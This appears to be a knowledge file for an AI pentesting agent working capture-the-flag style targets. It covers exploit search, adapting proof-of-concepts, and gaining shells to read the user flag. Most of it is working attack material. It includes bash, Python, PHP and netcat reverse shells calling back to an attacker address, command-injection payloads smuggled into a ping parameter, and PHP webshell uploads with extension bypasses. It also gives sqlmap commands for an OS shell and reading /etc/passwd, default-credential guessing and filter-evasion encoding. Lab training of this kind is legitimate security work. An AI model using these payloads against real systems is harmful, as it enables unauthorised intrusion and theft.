Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.
This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.
searchsploit - Local exploit-db searchmsfconsole - Metasploit frameworkrlwrap nc - Stabilize shellssqlmap - SQL injectioncurl - Manual web testinghydra - Service brute force (limited use)ssh/ftp/mysql - Test discovered credentialsCore Principle: Use multiple exploit sources in parallel - never rely on a single source.
Layered Exploit Search:
# Layer 1: Local database (fastest)
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
# If found → proceed to analysis
# If not found → immediately try Layer 2
# Layer 2: Metasploit framework
msfconsole -q -x "search type:exploit name:service_name; exit"
# If found → test with msfconsole
# If not found → immediately try Layer 3
# Layer 3: Online sources (GitHub, Google)
# GitHub API search (automated)
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
# Google search (manual if needed)
# Search: "CVE-YYYY-XXXXX exploit poc github"
# Search: "service_name version exploit"
# Layer 4: Adapt or create custom exploit
# Based on vulnerability description/advisory
# Modify existing PoC for your environment
Critical Rules:
successful_pathsBefore running:
Common modifications needed:
# Original (interactive)
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")
# Adapted (non-interactive)
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
# Use non-interactive mode
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# PHP reverse shell (for uploads)
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
# NC reverse shell
nc YOUR_IP 4444 -e /bin/bash
# Or if -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f
Always start listener before triggering exploit:
# Simple listener
nc -lvnp 4444
# Stabilized listener with rlwrap
rlwrap nc -lvnp 4444
Execute exploit and verify success:
# Run exploit
python3 exploit.py
# If successful, you should see connection in listener
# Test with:
id
whoami
pwd
Once you have basic shell:
# Upgrade to TTY shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
# Test simple upload
curl -F "[email protected]" http://TARGET/upload.php
# Bypass restrictions
# Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP
# Find uploaded file
gobuster dir -u http://TARGET/uploads -x php,phtml
# Trigger shell
curl http://TARGET/uploads/shell.php?cmd=id
# Test for SQLi
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3
# If found, try to get shell
sqlmap -u "http://TARGET/page.php?id=1" --os-shell
# Or read files
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
# Test common injection points
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
# Get reverse shell
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
# If you find CVE-2021-XXXX is applicable
# Search for PoC
searchsploit CVE-2021-XXXX
# Or check GitHub
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
# Download and adapt
wget https://raw.githubusercontent.com/user/repo/exploit.py
# Modify target IP, ports, payload
# Run
python3 exploit.py
Test these FIRST before complex exploits:
# SSH
ssh admin@TARGET # Try: admin/admin, root/root, root/toor
# FTP
ftp TARGET # Try: anonymous/anonymous, admin/admin
# MySQL
mysql -h TARGET -u root -p # Try: root/'', root/root
# Web Admin Panels
# Try: admin/admin, admin/password, admin/admin123
Core Principle: Always probe environment before choosing exploitation method.
Check your attacking machine:
# Check critical tools and versions
java -version 2>&1 | head -1 # For JNDI, deserialization exploits
python3 --version # For exploit scripts
gcc --version # For compiling exploits
which nc netcat ncat # For reverse shells
# Record environment limitations
# Example: If Java > 8, JNDI injection will be blocked
# Example: If no gcc, can't compile C exploits → need precompiled or script-based
Check target environment (after gaining RCE):
# Via webshell or command injection, test what's available:
which nc python python3 php perl bash sh curl wget
# Test specific versions if exploit requires them
python --version
php --version
# Check writable directories
ls -la /tmp /dev/shm /var/tmp
# Check for filtering/WAF
# Try: echo test
# Try: cat /etc/passwd
# If blocked, try base64 encoding or other bypass
Decision Tree for Reverse Shells:
1. Do we have RCE?
└─ Yes → Proceed to step 2
└─ No → Get RCE first (file upload, SQLi, etc.)
2. Check target environment
└─ nc available? → Use nc reverse shell
└─ python available? → Use python reverse shell
└─ php available? (web server) → Use PHP reverse shell
└─ bash available? → Use bash /dev/tcp method
└─ None? → Upload binary or use alternative method
3. Test for filtering
└─ Try basic command: echo test
└─ If special chars blocked (/, &, >, |) → Use encoding:
- Base64: echo BASE64 | base64 -d | bash
- Hex encoding
- URL encoding
└─ If commands filtered by keyword → Try alternatives:
- cat → head, tail, nl, more, less
- nc → /dev/tcp, telnet, socat
Example Adaptive Flow:
# Step 1: Gained RCE via file upload, test environment
curl "http://TARGET/shell.php?cmd=which nc"
# Response: empty (nc not available)
# Step 2: Try python
curl "http://TARGET/shell.php?cmd=which python3"
# Response: /usr/bin/python3 (available!)
# Step 3: Use python reverse shell
curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"
# If that fails with error, diagnose:
# - Syntax error? → Check for character filtering
# - No response? → May be WAF blocking
# → Try base64 encoded version
When exploit fails, systematically diagnose:
# Type 1: No response at all
Possible causes:
- Firewall blocking
- Wrong target IP/port
- Service actually not vulnerable
Action: Verify target is reachable, try different port, re-check vulnerability
# Type 2: Error message returned
Possible causes:
- Missing dependency (library, tool)
- Wrong syntax for target environment
- Version mismatch
Action: Read error carefully, install missing deps, adapt exploit code
# Type 3: Exploit runs but no shell
Possible causes:
- Payload blocked by filtering
- Target missing required tool (nc, python)
- Firewall blocking outbound connections
Action: Try different payload encoding, use different shell method, test with simple command first
# Type 4: Tool-specific failure (e.g., Metasploit fails)
Possible causes:
- Bug in Metasploit module
- Configuration issue
Action: Try alternative exploit source (GitHub, manual PoC), check module options
Record diagnosis in state:
jq '.failed_attempts += [{
"exploit": "CVE-2021-12345",
"tool": "metasploit",
"failure_type": "no shell received",
"diagnosis": "target missing nc, switched to python payload",
"resolution": "used GitHub PoC with python reverse shell - success"
}]' .pentest-state.json
Since you're in CLI-only environment:
# Instead of interactive shell, use command execution
curl http://TARGET/shell.php?cmd=cat+/etc/passwd
# Chain commands
curl http://TARGET/shell.php?cmd=cd+/home;ls+-la
# Use semicolons
curl http://TARGET/shell.php?cmd=id;whoami;pwd
# Start listener in background
nc -lvnp 4444 > shell-output.txt 2>&1 &
# Trigger exploit
python3 exploit.py
# Check output
cat shell-output.txt
# Send commands via named pipe
mkfifo /tmp/pipe
nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 &
Once you have command execution:
# Search for user.txt
find / -name "user.txt" 2>/dev/null
find /home -name "user.txt" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
# Common locations
cat /home/*/user.txt
cat /home/user/user.txt
# Read flag
cat /home/username/user.txt
# Verify format (should be 32-char hex)
cat /home/username/user.txt | wc -c # Should be 33 (32 + newline)
# Save to state file
USER_FLAG=$(cat /home/username/user.txt)
jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
"Connection refused"
netstat -tlnp | grep 4444"Module not found" (Python)
pip3 install requests pycrypto"Permission denied"
"Exploit works but no shell"
"Timeout" or "No response"
Found Vulnerability
│
├─ Is there a public exploit?
│ ├─ Yes → Search searchsploit/GitHub
│ │ → Adapt and run
│ └─ No → Can you write custom exploit?
│ → Develop PoC
│
├─ Initial Access Gained?
│ ├─ Yes → Capture user flag
│ │ → Proceed to privilege escalation
│ └─ No → Try alternative vector
│ → Review reconnaissance data
│ → Attempt different service
│
└─ Stuck after 3 attempts?
→ Re-run reconnaissance
→ Look for overlooked services
→ Check for misconfigurations
After successful exploitation:
{
"status": "user_access_gained",
"method": "File upload RCE via /uploads",
"access_level": "www-data",
"shell_type": "non-interactive webshell",
"user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
"credentials_found": [],
"next_steps": "Privilege escalation required for root flag"
}
Success criteria:
id, whoami